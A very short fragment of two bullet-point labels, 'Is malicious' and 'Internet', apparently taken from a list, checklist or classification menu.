  • Is malicious
  • Internet